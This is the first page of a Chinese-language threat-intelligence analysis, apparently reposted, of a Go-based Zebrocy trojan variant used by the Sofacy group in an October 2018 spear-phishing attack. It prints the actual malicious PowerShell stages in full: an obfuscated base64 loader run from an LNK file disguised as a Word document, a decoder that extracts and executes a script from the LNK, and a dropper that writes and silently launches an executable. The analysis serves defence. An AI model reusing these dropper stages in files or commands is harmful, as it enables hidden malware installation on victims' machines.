欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

针对Sofacy组织使用Go语言开发的新Zebrocy变体分析

来源:本站整理 作者:佚名 时间:2018-12-25 TAG: 我要投稿

虽然你可能已经看过一些关于Zebrocy恶意软件的分析了,但迄今为止,Sofacy威胁组织仍在持续使用着Zebrocy四处散播着攻击。我们之前就曾在一篇博文中提到过Zebrocy工具,探讨了它在2018年第一季度的并行攻击活动,以及最近的几起攻击。在10月底和11月初的攻击活动中我们发现,Zebrocy的开发人员再次使用了不同的编程语言——Go语言,来创建了一个新变种的木马。使用不同的编程语言来创建一个功能类似的木马对Sofacy团伙来说并不是什么新鲜事,Zebrocy变种就曾用AutoIt、Delphi、VB、NET、 c#和Visual c++创建过。虽然我们当前还不能确定Sofacy用Go语言编写新木马的充分动机,但能有一点能够确认的是,此举是为了通过改变Zebrocy的结构使其更难以被检测。
我们在两起独立的攻击事件中发现了Zebrocy的Go变体。第一起攻击事件发生在10月11日,途径是一封带有LNK快捷附件的鱼叉式钓鱼电子邮件。LNK快捷方式用于运行一系列PowerShell脚本并从中提取要安装和执行的有效负载;但PowerShell脚本编码却是错误的,无法按照交付的方式安装或运行负载。因此,第一起攻击事件并不是成功的,但其目的、技术和指标还是值得探讨的。而在最近Sofacy的最新活动中,我们又发现了与发生在10月至11月中旬的Dear Joohn攻击行动中相同的Zebrocy的Go变体。
第一起攻击事件
这起攻击发生在2018年10月11日,攻击载体是一封鱼叉式钓鱼电子邮件,邮件内容是探讨美国的制裁对俄罗斯经济的影响。其中“发件人”地址和签名包含了攻击对象的个人姓名,而“收件人”字段却是为空的。这使我们相信,该邮件的“密件抄送”字段中包含了目标个人。图1显示了这次攻击中使用的电子邮件。

图1 Go Zebrocy攻击中使用的电子邮件
有效载荷
恶意文档ПротиводействиеДумыСанкциямСША.doc(SHA256:d77eb89501b0a60322bc69692007b9b7f1b5a85541a2aaf21caf7baf0fe0049e)试图伪装成Word文档,但实际上该文件却是一个LNK快捷方式文件。打开时,LNK文件会在命令提示符中运行以下命令行:
powershell.exe -nop -w 1 $i853=[TeXt.EnCoDING]::utF8.geTStrInG([conVErT]::frOmbaSE64stRing('JHAxLCRwMj0zNjU5LDY5MjQ3NjQ7JHBhdGhUb0xOSz0nQzUgcmVnaW9uYWwgY29uZmVyZW5jZSBhbmQgdHJhaW5pbmcgd29ya3Nob3Agb24gY29tbXVuaXR5IHBvbGljaW5nKDEpLmRvY3gubG5rJztpZigtbk9UKFRlU3QtcEF0SCAkcGF0aFRvTE5LKSl7JERpckQ9R2VULUNISUxkSVRFTSAtcEF0aCAkZW52OnRlbXAgLWZpTFRlciAkcGF0aFRvTE5LIC1yRWNVclNFO1tpTy5kaVJlY3RvUlldOjpzRVRDVXJyZW50RElyRWN0b1JZKCREaXJELmRJcmVDVE9SWU5BTWUpO30kRmlsZVN0cmVhbWE9bkV3LW9iakVDVCBpby5mSUxlU1RyZUFtICRwYXRoVG9MTkssJ09wZU4nLCdSZUFkJywncmVhRHdSSVRFJzskQXJyYXlNYXM9TkV3LW9iamVjVCBieVRFW10oJHAyKTskRmlsZVN0cmVhbWEuU0VlSygkcDEsW2lvLlNlRUtvUmlHaW5dOjpCRUdpbik7JEZpbGVTdHJlYW1hLnJFQUQoJEFycmF5TWFzLDAsJHAyKTskQXJyYXlNYXM9W0NvbnZlclRdOjpGck9tYmFzRTY0Q0hhckFyUkF5KCRBcnJheU1hcywwLCRBcnJheU1hcy5MZU5HVGgpOyRkdWFjYWp1QT1bdGV4VC5FbkNPZEluR106OlVuaWNvZGUuZ0VUc3RSSW5nKCRBcnJheU1hcyk7aWVYICRkdWFjYWp1QTs='));ieX $i853;
该快捷方式使用PowerShell对第二个PowerShell脚本进行base64解码并执行。第二个PowerShell脚本解码为以下内容:
$p1,$p2=3659,6924764;$pathToLNK='C5 regional conference and training workshop on community policing(1).docx.lnk';if(-nOT(TeSt-pAtH $pathToLNK)){$DirD=GeT-CHILdITEM -pAth $env:temp -fiLTer $pathToLNK -rEcUrSE;[iO.diRectoRY]::sETCUrrentDIrEctoRY($DirD.dIreCTORYNAMe);}$FileStreama=nEw-objECT io.fILeSTreAm $pathToLNK,'OpeN','ReAd','reaDwRITE';$ArrayMas=NEw-objecT byTE[]($p2);$FileStreama.SEeK($p1,[io.SeEKoRiGin]::BEGin);$FileStreama.rEAD($ArrayMas,0,$p2);$ArrayMas=[ConverT]::FrOmbasE64CHarArRAy($ArrayMas,0,$ArrayMas.LeNGTh);$duacajuA=[texT.EnCOdInG]::Unicode.gETstRIng($ArrayMas);ieX $duacajuA;
上面的PowerShell脚本会试图直接从LNK快捷文件中提取另一个PowerShell脚本并执行。由于未知的原因,创建这个LNK快捷方式的作者用错了LNK文件的文件名——C5 regional conference and training workshop on community policing(1).docx而不是交付文档中的ПротиводействиеДумыСанкциямСША.doc。LNK快捷方式文件名与电子邮件中提供的文件名不匹配,第二个PowerShell脚本将无法获得要安装在系统上的有效负载,因此这种攻击永远不会成功。其中,名为The C5 regional conference and training workshop on community policing(1).docx的LNK文件可能是攻击者之前使用过的文档,这次忘了对其更改。
如果攻击者在上面的脚本中使用了LNK正确的交付文件名,那么用于硬编码的“3659”偏移量(用于在LNK文件中寻找3659个字节)会将PowerShell脚本定位在LNK文件中。然后该脚本将读取硬编码的字节数并在该偏移量的6,924,764字节处执行。从LNK文件中获取的结果PowerShell脚本具有以下内容,为简洁起见,我们已修剪了一些编码数据并将其替换为“[..snip ..]”:
$6vlJwyyB = @('C5 regional conference and training workshop on community policing(1).exe','C5 regional conference and training workshop on community policing(1).docx');$TcCd3Fej = "C5 regional conference and training workshop on community policing(1).exe";$Aq3NkyDG = @("TVqQAAMA[..snip..]","UEsDBBQABgAIAA[..snip..]");$ggdDQhlx = "C5 regional conference and training workshop on community policing(1).docx";FOR($I=0;$I -lt $6vLjwYYb.LengTH;$i++){[BYtE[]]$YGktk0Nk = [cOnveRt]::frOmBaSE64StriNg($aq3nkYDg[$I]);[syStEm.IO.fILE]::WrItEaLlbYtES($EnV:pUbLIc+"\"+$6VLJwYYB[$I],$YGktK0nk);}$qsVmUm76 = $Env:public+"\"+$tCcd3Fej;$GGdDQhLxPatH = $env:publIC+"\"+$gGddQHLX;staRT-pROCess -wINDowstylE HIDdeN -FIlepAth $qsVMuM76;StART-ProceSs -FilepaTh $GgDdQHlxpATH;

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载